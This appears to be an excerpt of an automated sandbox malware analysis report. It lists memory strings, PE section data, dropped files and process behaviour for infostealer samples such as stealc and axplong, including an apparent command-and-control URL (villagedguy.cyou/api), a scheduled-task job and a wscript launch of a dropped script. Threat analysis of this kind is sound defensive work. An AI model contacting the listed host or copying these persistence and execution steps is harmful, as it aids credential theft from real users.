Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://villagedguy.cyou/
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://villagedguy.cyou/6
Source: new_v8.exe, 00000016.00000003.2206163710.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2227968295.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://villagedguy.cyou/api
Source: new_v8.exe, 00000016.00000003.2526420431.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://villagedguy.cyou/api#P
Source: new_v8.exe, 00000016.00000003.2853535555.0000000000BF3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2783040007.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2852199772.0000000000BED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://villagedguy.cyou/api(ws
Source: new_v8.exe, 00000016.00000003.2207797471.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2208207626.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2206163710.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://villagedguy.cyou/api0
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://villagedguy.cyou/api3
Source: new_v8.exe, 00000016.00000003.2415792676.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://villagedguy.cyou/api9
Source: new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://villagedguy.cyou/apiC
Source: new_v8.exe, 00000016.00000003.2783040007.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://villagedguy.cyou/apie
Source: new_v8.exe, 00000016.00000003.2254203334.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2256699750.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://villagedguy.cyou/apila
Source: new_v8.exe, 00000016.00000003.2207797471.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2206163710.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://villagedguy.cyou/apime
Source: new_v8.exe, 00000016.00000003.2783040007.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2476025408.0000000000BED000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2476112648.0000000000BF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://villagedguy.cyou/apip
Source: new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://villagedguy.cyou/s
Source: new_v8.exe, 00000016.00000003.2257510373.0000000000BD3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2256959453.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2852199772.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2404258386.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2460996534.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2476025408.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2779671424.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2342182926.0000000000BD3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2227458323.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2256925605.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2227968295.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://villagedguy.cyou:443/api
Source: new_v8.exe, 00000016.00000003.2176713314.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2177592016.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://villagedguy.cyou:443/api4
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/06
Source: chrome.exe, 0000002B.00000002.2704034525.00002B3C00064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 0000002B.00000002.2771964516.00002B3C00CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2768140159.00002B3C00A18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2759409029.00002B3C002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761091858.00002B3C0060C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2764212832.00002B3C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2366929652.00002B3C00448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2766763338.00002B3C0098B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2307171567.00002B3C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2371146012.00002B3C00EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760940840.00002B3C005C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2759409029.00002B3C002F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2764406614.00002B3C00848000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2766763338.00002B3C00970000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2764406614.00002B3C00848000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2766763338.00002B3C00970000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 0000002B.00000002.2773346174.00002B3C00E24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770894499.00002B3C00B84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761019091.00002B3C005F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: chrome.exe, 0000002B.00000002.2768140159.00002B3C00A18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2307171567.00002B3C0046C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 0000002B.00000002.2760811390.00002B3C0058C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/RAM:
Source: stealc_default2.exe, 00000011.00000003.2103880354.000000002D5AA000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2231077746.0000000003F00000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: stealc_default2.exe, 00000011.00000003.2103880354.000000002D5AA000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2231077746.0000000003F00000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/kZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGp
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.c
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/

System Summary

barindex
Source: 33.2.f55899dae2.exe.1c770000.2.raw.unpack, searchX64LPVOIDhierarchy.cs Large array initialization: GetGuidArrayRestrictedSkipVisibilityChecks: array initializer size 440832
Source: 33.0.f55899dae2.exe.59408e.1.raw.unpack, searchX64LPVOIDhierarchy.cs Large array initialization: GetGuidArrayRestrictedSkipVisibilityChecks: array initializer size 440832
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe File dump: service123.exe.18.dr 314617856 Jump to dropped file
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: axplong.exe.6.dr Static PE information: section name:
Source: axplong.exe.6.dr Static PE information: section name: .idata
Source: axplong.exe.6.dr Static PE information: section name:
Source: random[2].exe.13.dr Static PE information: section name:
Source: random[2].exe.13.dr Static PE information: section name: .rsrc
Source: random[2].exe.13.dr Static PE information: section name: .idata
Source: random[2].exe.13.dr Static PE information: section name:
Source: c8908bf20d.exe.13.dr Static PE information: section name:
Source: c8908bf20d.exe.13.dr Static PE information: section name: .rsrc
Source: c8908bf20d.exe.13.dr Static PE information: section name: .idata
Source: c8908bf20d.exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name: .idata
Source: 2dc588f7b5.exe.13.dr Static PE information: section name:
Source: 2dc588f7b5.exe.13.dr Static PE information: section name: .idata
Source: new_v8[1].exe.13.dr Static PE information: section name: .vmp+
Source: new_v8[1].exe.13.dr Static PE information: section name: .vmp+
Source: new_v8[1].exe.13.dr Static PE information: section name: .vmp+
Source: new_v8.exe.13.dr Static PE information: section name: .vmp+
Source: new_v8.exe.13.dr Static PE information: section name: .vmp+
Source: new_v8.exe.13.dr Static PE information: section name: .vmp+
Source: random[1].exe1.13.dr Static PE information: section name:
Source: random[1].exe1.13.dr Static PE information: section name: .rsrc
Source: random[1].exe1.13.dr Static PE information: section name: .idata
Source: 550b7cfe5f.exe.13.dr Static PE information: section name:
Source: 550b7cfe5f.exe.13.dr Static PE information: section name: .rsrc
Source: 550b7cfe5f.exe.13.dr Static PE information: section name: .idata
Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.dr Static PE information: section name:
Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.dr Static PE information: section name: .idata
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr Static PE information: section name:
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr Static PE information: section name: .idata
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr Static PE information: section name:
Source: stealc_default2[1].exe.13.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: stealc_default2.exe.13.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe File created: C:\Windows\LuggageRepresentations
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe File created: C:\Windows\AdditionsSalvation
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe File created: C:\Windows\SixCream
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe File created: C:\Windows\HomelessLaser
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe File created: C:\Windows\ActuallyFtp
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe File created: C:\Windows\EauOfficial
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00C5E440 13_2_00C5E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00C54CF0 13_2_00C54CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00C93068 13_2_00C93068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00C87D83 13_2_00C87D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00C54AF0 13_2_00C54AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00C9765B 13_2_00C9765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00C92BD0 13_2_00C92BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00C9777B 13_2_00C9777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00C96F09 13_2_00C96F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00C98720 13_2_00C98720
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C81ECC0 17_2_6C81ECC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C87ECD0 17_2_6C87ECD0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8E6C00 17_2_6C8E6C00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8FAC30 17_2_6C8FAC30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C82AC60 17_2_6C82AC60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8B6D90 17_2_6C8B6D90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C824DB0 17_2_6C824DB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C9ACDC0 17_2_6C9ACDC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C9A8D20 17_2_6C9A8D20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C94AD50 17_2_6C94AD50
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8EED70 17_2_6C8EED70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8A6E90 17_2_6C8A6E90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C82AEC0 17_2_6C82AEC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8C0EC0 17_2_6C8C0EC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C900E20 17_2_6C900E20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8BEE70 17_2_6C8BEE70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C968FB0 17_2_6C968FB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C82EFB0 17_2_6C82EFB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C820FE0 17_2_6C820FE0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8FEFF0 17_2_6C8FEFF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C826F10 17_2_6C826F10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C960F20 17_2_6C960F20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C88EF40 17_2_6C88EF40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8E2F70 17_2_6C8E2F70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C9268E0 17_2_6C9268E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C870820 17_2_6C870820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8AA820 17_2_6C8AA820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8F4840 17_2_6C8F4840
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8B09A0 17_2_6C8B09A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8DA9A0 17_2_6C8DA9A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8E09B0 17_2_6C8E09B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C93C9E0 17_2_6C93C9E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8549F0 17_2_6C8549F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C876900 17_2_6C876900
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C858960 17_2_6C858960
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C89EA80 17_2_6C89EA80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8CEA00 17_2_6C8CEA00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8D8A30 17_2_6C8D8A30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C89CA70 17_2_6C89CA70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8C0BA0 17_2_6C8C0BA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C926BE0 17_2_6C926BE0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C94A480 17_2_6C94A480
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8664D0 17_2_6C8664D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8BA4D0 17_2_6C8BA4D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C884420 17_2_6C884420
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8AA430 17_2_6C8AA430
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C838460 17_2_6C838460
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8145B0 17_2_6C8145B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8EA5E0 17_2_6C8EA5E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8AE5F0 17_2_6C8AE5F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C968550 17_2_6C968550
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C878540 17_2_6C878540
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C924540 17_2_6C924540
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C882560 17_2_6C882560
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8C0570 17_2_6C8C0570
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8446D0 17_2_6C8446D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C87E6E0 17_2_6C87E6E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8BE6E0 17_2_6C8BE6E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C87C650 17_2_6C87C650
